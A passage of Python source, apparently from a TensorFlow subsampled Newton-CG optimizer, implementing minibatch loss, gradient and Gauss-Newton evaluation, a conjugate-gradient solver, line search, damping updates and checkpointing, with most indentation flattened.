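	# hold sums, and the add_reg_avg_* ops then rescale by 1/num_data (or 1/GNsize) and add
	# the regularization term.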
def minibatch(self, data_batch, place_holder_x, place_holder_y, mode):
"""
A function to evaluate either function value, global gradient or sub-sampled Gv
"""
if mode not in ('funonly', 'fungrad', 'Gv'):
raise ValueError('Unknown mode other than funonly & fungrad & Gv!')
inputs, labels = data_batch
num_data = labels.shape[0]
num_segment = math.ceil(num_data/self.config.bsize)
x, y = place_holder_x, place_holder_y
# before estimation starts, need to zero out f, grad and Gv according to the mode
if mode == 'funonly':
assert num_data == self.config.num_data
assert num_segment == self.num_grad_segment
self.sess.run(self.zero_loss)
elif mode == 'fungrad':
assert num_data == self.config.num_data
assert num_segment == self.num_grad_segment
self.sess.run([self.zero_loss, self.zero_grad])
else:
assert num_data == self.config.GNsize
assert num_segment == self.num_Gv_segment
self.sess.run(self.zero_Gv)
for i in range(num_segment):
load_time = time.time()
idx = np.arange(i * self.config.bsize, min((i+1) * self.config.bsize, num_data))
batch_input = inputs[idx]
batch_labels = labels[idx]
batch_input = np.ascontiguousarray(batch_input)
batch_labels = np.ascontiguousarray(batch_labels)
self.config.elapsed_time += time.time() - load_time
if mode == 'funonly':
self.sess.run(self.cal_loss, feed_dict={
x: batch_input,
y: batch_labels,})
elif mode == 'fungrad':
self.sess.run(self.cal_lossgrad, feed_dict={
x: batch_input,
y: batch_labels,})
else:
self.sess.run(self.cal_lossGv, feed_dict={
x: batch_input,
y: batch_labels})
# average over batches
if mode == 'funonly':
self.sess.run(self.add_reg_avg_loss)
elif mode == 'fungrad':
self.sess.run([self.add_reg_avg_loss, self.add_reg_avg_grad])
else:
self.sess.run(self.add_reg_avg_Gv,
feed_dict={self._lambda: self.config._lambda})
def _update_model(self):
update_model_ops = []
x = self.inverse_vectorize(self.s, self.param)
for i, p in enumerate(self.param):
op = tf.compat.v1.assign(p, p + (self.alpha-self.old_alpha) * x[i])
update_model_ops.append(op)
return tf.group(*update_model_ops)
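	# Note (added for clarity): updating with (alpha - old_alpha) * s lets the backtracking
	# line search in newton() shrink a trial step in place instead of undoing it and
	# re-applying a smaller one.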
def _init_cg_vars(self):
init_ops = []
init_r = tf.compat.v1.assign(self.r, -self.g)
init_v = tf.compat.v1.assign(self.v, -self.g)
init_s = tf.compat.v1.assign(self.s, tf.zeros_like(self.g))
gnorm = self.calc_norm(self.g)
init_rTr = tf.compat.v1.assign(self.rTr, gnorm**2)
init_cgtol = tf.compat.v1.assign(self.cgtol, self.config.xi*gnorm)
init_ops = [init_r, init_v, init_s, init_rTr, init_cgtol]
return tf.group(*init_ops)
def _CG(self):
"""
CG:
define operations that will be used in method newton
		As with the loss calculation above, Gv has already been summed over batches
		when the samples were fed through the neural network.
"""
def CG_ops():
vGv = tf.tensordot(self.v, self.Gv, axes=1)
alpha = self.rTr / vGv
with tf.control_dependencies([alpha]):
update_s = tf.compat.v1.assign(self.s, self.s + alpha * self.v, name='update_s_ops')
update_r = tf.compat.v1.assign(self.r, self.r - alpha * self.Gv, name='update_r_ops')
with tf.control_dependencies([update_s, update_r]):
rnewTrnew = self.calc_norm(update_r)**2
update_beta = tf.compat.v1.assign(self.beta, rnewTrnew / self.rTr)
with tf.control_dependencies([update_beta]):
update_rTr = tf.compat.v1.assign(self.rTr, rnewTrnew, name='update_rTr_ops')
return tf.group(*[update_s, update_beta, update_rTr])
def update_v():
return tf.compat.v1.assign(self.v, self.r + self.beta*self.v, name='update_v')
return (CG_ops(), update_v())
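	# Hedged summary of the recurrences implemented by CG_ops()/update_v() above, i.e.
	# standard conjugate gradient on the damped Gauss-Newton system (the lambda and 1/C
	# terms are folded into Gv by add_reg_avg_lossGv):
	#   alpha_k = r_k^T r_k / (v_k^T G v_k)
	#   s_{k+1} = s_k + alpha_k v_k
	#   r_{k+1} = r_k - alpha_k G v_k
	#   beta_k  = r_{k+1}^T r_{k+1} / (r_k^T r_k)
	#   v_{k+1} = r_{k+1} + beta_k v_k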
def newton(self, full_batch, val_batch, saver, network, test_network=None):
"""
Conduct newton steps for training
args:
full_batch & val_batch: provide training set and validation set. The function will
			save the best model evaluated on the validation set for future prediction.
network: a tuple contains (x, y, loss, outputs).
test_network: a tuple similar to argument network. If you use layers which behave differently
in test phase such as batchnorm, a separate test_network is needed.
return:
None
"""
# check whether data is valid
full_inputs, full_labels = full_batch
assert full_inputs.shape[0] == full_labels.shape[0]
if full_inputs.shape[0] != self.config.num_data:
raise ValueError('The number of full batch inputs does not agree with the config argument.\
This is important because global loss is averaged over those inputs')
x, y, _, outputs = network
tf.compat.v1.summary.scalar('loss', self.f)
merged = tf.compat.v1.summary.merge_all()
train_writer = tf.compat.v1.summary.FileWriter('./summary/train', self.sess.graph)
print(self.config.args)
if not self.config.screen_log_only:
log_file = open(self.config.log_file, 'w')
print(self.config.args, file=log_file)
self.minibatch(full_batch, x, y, mode='fungrad')
f = self.sess.run(self.f)
output_str = 'initial f: {:.3f}'.format(f)
print(output_str)
if not self.config.screen_log_only:
print(output_str, file=log_file)
best_acc = 0.0
total_running_time = 0.0
self.config.elapsed_time = 0.0
total_CG = 0
for k in range(self.config.iter_max):
# randomly select the batch for Gv estimation
idx = np.random.choice(np.arange(0, full_labels.shape[0]),
size=self.config.GNsize, replace=False)
mini_inputs = full_inputs[idx]
mini_labels = full_labels[idx]
start = time.time()
self.sess.run(self.init_cg_vars)
cgtol = self.sess.run(self.cgtol)
avg_cg_time = 0.0
for CGiter in range(1, self.config.CGmax+1):
cg_time = time.time()
self.minibatch((mini_inputs, mini_labels), x, y, mode='Gv')
avg_cg_time += time.time() - cg_time
self.sess.run(self.CG)
rnewTrnew = self.sess.run(self.rTr)
if rnewTrnew**0.5 <= cgtol or CGiter == self.config.CGmax:
break
self.sess.run(self.update_v)
print('Avg time per Gv iteration: {:.5f} s\r\n'.format(avg_cg_time/CGiter))
gs, sGs = self.sess.run([self.update_gs, self.update_sGs], feed_dict={
self._lambda: self.config._lambda
})
# line_search
f_old = f
alpha = 1
while True:
old_alpha = 0 if alpha == 1 else alpha/0.5
self.sess.run(self.update_model, feed_dict={
self.alpha:alpha, self.old_alpha:old_alpha
})
prered = alpha*gs + (alpha**2)*sGs
self.minibatch(full_batch, x, y, mode='funonly')
f = self.sess.run(self.f)
actred = f - f_old
if actred <= self.config.eta*alpha*gs:
break
alpha *= 0.5
# update lambda
ratio = actred / prered
if ratio < 0.25:
self.config._lambda *= self.config.boost
elif ratio >= 0.75:
self.config._lambda *= self.config.drop
self.minibatch(full_batch, x, y, mode='fungrad')
f = self.sess.run(self.f)
gnorm = self.sess.run(self.gnorm)
summary = self.sess.run(merged)
train_writer.add_summary(summary, k)
# exclude data loading time for fair comparison
end = time.time()
end = end - self.config.elapsed_time
total_running_time += end-start
self.config.elapsed_time = 0.0
total_CG += CGiter
output_str = '{}-iter f: {:.3f} |g|: {:.5f} alpha: {:.3e} ratio: {:.3f} lambda: {:.5f} #CG: {} actred: {:.5f} prered: {:.5f} time: {:.3f}'.\
format(k, f, gnorm, alpha, actred/prered, self.config._lambda, CGiter, actred, prered, end-start)
print(output_str)
if not self.config.screen_log_only:
print(output_str, file=log_file)
if val_batch is not None:
# Evaluate the performance after every Newton Step
				if test_network is None:
val_loss, val_acc, _ = predict(
self.sess,
network=(x, y, self.loss, outputs),
test_batch=val_batch,
bsize=self.config.bsize,
)
else:
					# A separate test network has not been implemented yet...
val_loss, val_acc, _ = predict(
self.sess,
network=test_network,
test_batch=val_batch,
bsize=self.config.bsize
)
output_str = '\r\n {}-iter val_acc: {:.3f}% val_loss {:.3f}\r\n'.\
format(k, val_acc*100, val_loss)
print(output_str)
if not self.config.screen_log_only:
print(output_str, file=log_file)
if val_acc > best_acc:
best_acc = val_acc
checkpoint_path = self.config.model_file
save_path = saver.save(self.sess, checkpoint_path)
print('Best model saved in {}\r\n'.format(save_path))
if val_batch is None:
checkpoint_path = self.config.model_file
save_path = saver.save(self.sess, checkpoint_path)
print('Model at the last iteration saved in {}\r\n'.format(save_path))
output_str = 'total_#CG {} | total running time {:.3f}s'.format(total_CG, total_running_time)
else:
output_str = 'Final acc: {:.3f}% | best acc {:.3f}% | total_#CG {} | total running time {:.3f}s'.\
format(val_acc*100, best_acc*100, total_CG, total_running_time)
print(output_str)
if not self.config.screen_log_only:
print(output_str, file=log_file)
log_file.close()
|